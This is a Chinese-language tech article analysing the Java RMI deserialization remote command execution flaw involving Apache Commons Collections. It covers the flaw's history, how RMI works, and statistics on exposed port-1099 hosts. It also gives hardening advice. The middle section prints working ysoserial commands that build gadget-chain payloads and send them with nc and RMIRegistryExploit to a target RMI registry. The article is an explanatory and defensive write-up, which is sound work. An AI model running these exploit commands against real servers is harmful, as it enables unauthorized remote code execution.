JAVA反序列化中Rmi命令執行漏洞的分析

本篇文章給大家分享的是有關JAVA反序列化中Rmi命令執行漏洞的分析，小編覺得挺實用的，因此分享給大家學習，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

1       概述

早在2015年的1月28號，Gabriel Lawrence和Chris Frohoff在AppSecCali上給出了一個報告，報告中介紹了Java反序列化漏洞可以利用Apache Commons Collections這個常用的Java庫來實現任意代碼執行，但當時并沒有引起太大的關注。后來FoxGlove Security安全團隊發布了一篇長博客，闡述了利用Java反序列化和Apache Commons Collections這一基礎類庫實現遠程命令執行的真實案例，各大Java Web Server紛紛躺槍，這個漏洞橫掃WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版，當時各大src平臺已被該漏洞刷屏，漏洞鋪天蓋地而來。

針對這個"2015年最被低估"的漏洞，各大受影響的Java應用廠商陸續發布了修復后的版本，Apache Commons Collections項目也對存在漏洞的類庫進行了一定的安全處理，但是網絡上仍有大量網站受此漏洞影響。本次討論的對象是JAVA RMI反序列化遠程命令執行漏洞。

2       何為java RMI

RMI是REMOTE METHODINVOCATION的簡稱，是J2SE的一部分，能夠讓程序員開發出基于JAVA的分布式應用。一個RMI對象是一個遠程JAVA對象，可以從另一個JAVA虛擬機上（甚至跨過網絡）調用它的方法，可以像調用本地JAVA對象的方法一樣調用遠程對象的方法，使分布在不同的JVM中的對象的外表和行為都像本地對象一樣。對于任何一個以對象為參數的RMI接口，你都可以發一個自己構建的對象，迫使服務器端將這個對象按任何一個存在于class path中的可序列化類來反序列化。

Java rmi遠程調用如下：

RMI遠程調用步驟：

l 客戶對象調用客戶端輔助對象上的方法

l 客戶端輔助對象打包調用信息（變量，方法名），通過網絡發送給服務端輔助對象

l 服務端輔助對象將客戶端輔助對象發送來的信息解包，找出真正被調用的方法以及該方法所在對象

l 調用真正服務對象上的真正方法，并將結果返回給服務端輔助對象

l 服務端輔助對象將結果打包，發送給客戶端輔助對象

l 客戶端輔助對象將返回值解包，返回給客戶對象

l 客戶對象獲得返回值

3       Java Rmi命令執行是什么

1099端口是Java RMI的默認端口，RMI默認使用序列化來完成所有的交互，所以這是非常常見的漏洞。如果該端口暴露在公網上，且使用了Apache Commons Collections的漏洞版本，就可以在該服務器上執行相關命令。此處嘗試利用ysoserial進行漏洞分析。

利用Java中Proxy的形式對攻擊payload進行封裝，并在對Proxy實現重新封裝的過程中使用了大量的泛類型，使得payload可以應對不同的應用。

利用該漏洞可在服務器上執行相關命令，此處舉例如下

$ java -jar ysoserial.jar CommonsCollections1 calc.exe |xxd

0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl

0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A

0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat

0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov

0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........

0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin

$ nc xx.xx.xx.xx 1099 < groovypayload.bin

$ java -cp ysoserial.jarysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

利用該漏洞查看相關datasource文件內容

RMI服務的攻擊，同樣可以使用URLClassLoader方法進行回顯

4       Java Rmi當前漏洞影響

雖然Java RMI服務遠程命令執行漏洞過去了4年的時間，但是公網上依然有很多服務器存在該漏洞，此處對國內1099的端口開放情況做了初步統計，具體結果如下：

通過對簡單掃描結果進行統計發現，1099端口中國開放12310 臺，其中將端口用于RMI交互的主機3891 臺，占比31.6%；存在反序列化漏洞3114 臺，占比 25.29%。

5       加固意見

?  關閉rmi服務的端口在公網的開放；

?  下載SerialKiller臨時補丁，這個jar后放置于classpath，將應用代碼中的java.io.ObjectInputStream替換為SerialKiller，之后配置讓其能夠允許或禁用一些存在問題的類，SerialKiller有Hot-Reload,Whitelisting,Blacklisting幾個特性，控制了外部輸入反序列化后的可信類型

?  在不影響業務的情況下，臨時刪除掉項目里的InvokerTransformer.class文件；

?  定時對WebLogic、Apache、JBoss等中間件進行升級。

以上就是JAVA反序列化中Rmi命令執行漏洞的分析，小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。